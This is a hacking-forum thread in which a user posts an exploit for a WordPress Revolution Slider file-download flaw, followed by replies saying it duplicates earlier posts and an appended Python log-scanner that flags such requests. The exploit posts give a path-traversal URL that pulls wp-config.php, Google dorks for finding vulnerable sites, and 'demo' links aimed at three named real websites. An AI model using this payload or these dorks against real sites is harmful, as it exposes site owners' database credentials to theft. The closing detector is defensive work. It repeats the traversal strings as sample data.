Aerosol Posted January 27, 2015

[+] Title: Wordpress slider revolution local file download
[+] Date: 2015-01-25
[+] Author: JOK3R
[+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/
[+] Tested on: windows 7 / firefox , kali linux / firefox
[+] Vulnerable Files: /plugins/revolution-slider/
[+] Dork : "Index of" /wp-content/plugins/revolution-slider/

### POC:
http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php

### Demo:
http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php

### Credits:
[+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS*
And all Iranian hackers and exploiters <3
[+] iran-cyber.in
Kalashnikov. Posted January 27, 2015

https://rstforums.com/forum/94729-wordpress-revslider-local-file-disclosure.rst?highlight=revslider
???? Have you run out of things to copy, so now you've started making duplicate posts?
Aerosol (Author) Posted January 27, 2015

[+] Title: Wordpress slider revolution local file download
[+] Date: 2015-01-25
[+] Author: JOK3R
[+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/
[+] Tested on: windows 7 / firefox , kali linux / firefox
[+] Vulnerable Files: /plugins/revolution-slider/
[+] Dork : "Index of" /wp-content/plugins/revolution-slider/

&

# Exploit Title: [Wordpress RevSlider Plugin LFD]
# Google Dork: inurl:/admin-ajax.php?action=revslider_show_image
# Date: 12/29/14
# Exploit Author: FarbodEZRaeL
# Vendor Homepage: iranhack.org
# Software Link: wordpress.org
# Tested on: windows

Mind your own business.
Kalashnikov. Posted January 27, 2015

"& Mind your own business."
It's the same crap, why are you posting it twice?
Bit-ul Posted January 27, 2015

"It's the same crap, why are you posting it twice?"
The code looks different and he didn't catch on.
Gio33 Posted January 27, 2015

https://rstforums.com/forum/89150-revslider-4-6-security-vulnerability.rst?highlight=revslider
Mhm .. 09/2014
admin-ajax.php?action=revslider_show_image
vs
admin-ajax.php?action=revolution-slider_show_image
Same shit.
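
Added example, not part of any post in this thread: a log check that treats the two action names compared above as one pattern and flags admin-ajax.php requests whose img value leaves the image directory or names a PHP file. The log format (combined access log), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Both AJAX action names mentioned in this thread.
ACTIONS = {"revslider_show_image", "revolution-slider_show_image"}

# Request field of a combined-format access log line: "METHOD target HTTP/x"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_suspicious(target: str) -> bool:
    """True if the request hits admin-ajax.php with a show_image action and
    an img value that contains traversal, is absolute, or names a PHP file."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    params = parse_qs(parts.query)
    if not ACTIONS & set(params.get("action", [])):
        return False
    for img in params.get("img", []):
        # parse_qs decodes once; decode again to catch double encoding.
        decoded = unquote(img).replace("\\", "/").lower()
        if ".." in decoded or decoded.startswith("/") or decoded.endswith(".php"):
            return True
    return False

def scan(lines):
    """Return (client_ip, target) for every suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_suspicious(m.group(1)):
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits

# Constructed sample log lines (documentation IP ranges, no real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Jan/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 200 3121',
    '198.51.100.4 - - [27/Jan/2015:10:02:10 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%252e%252e%2Fwp-config.php HTTP/1.1" 200 3121',
    '192.0.2.15 - - [27/Jan/2015:10:03:44 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2015/01/slide1.jpg HTTP/1.1" 200 48211',
    '192.0.2.15 - - [27/Jan/2015:10:04:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58',
]

if __name__ == "__main__":
    for ip, target in scan(SAMPLE_LOG):
        print(ip, target)
```

A 200 response on a flagged line is the case to follow up first, since it suggests the file contents were returned and any credentials in it should be rotated.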